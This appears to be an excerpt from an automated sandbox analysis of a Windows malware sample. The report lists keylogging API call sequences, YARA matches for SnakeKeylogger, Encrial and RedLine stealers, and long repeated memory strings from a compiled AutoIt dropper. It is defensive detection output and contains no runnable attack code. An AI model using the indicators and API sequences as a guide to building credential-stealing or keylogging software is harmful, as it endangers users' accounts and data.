Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C5AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 0_2_00C5AA57
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C89576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00C89576
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00EF9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 2_2_00EF9576

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.chordates.exe.3a90000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.chordates.exe.13e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.4470352706.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.2040744990.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4470368288.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.2183245336.00000000013E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Binary is likely a compiled AutoIt script file
Source: DSD876543456780000.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DSD876543456780000.exe, 00000000.00000003.2020898944.00000000036F1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_31249708-3
Source: DSD876543456780000.exe, 00000000.00000003.2020898944.00000000036F1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_05664397-9
Source: DSD876543456780000.exe, 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_0215ef2a-5
Source: DSD876543456780000.exe, 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_8ef72394-3
Source: chordates.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: chordates.exe, 00000002.00000002.2040377228.0000000000F22000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b1c16028-0
Source: chordates.exe, 00000002.00000002.2040377228.0000000000F22000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a431715a-5
Source: chordates.exe, 00000005.00000002.2180979584.0000000000F22000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_74bd6b52-7
Source: chordates.exe, 00000005.00000002.2180979584.0000000000F22000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_7dc1774e-b
Source: DSD876543456780000.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_08f96a85-8
Source: DSD876543456780000.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_6c380293-e
Source: chordates.exe.0.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b296044c-9
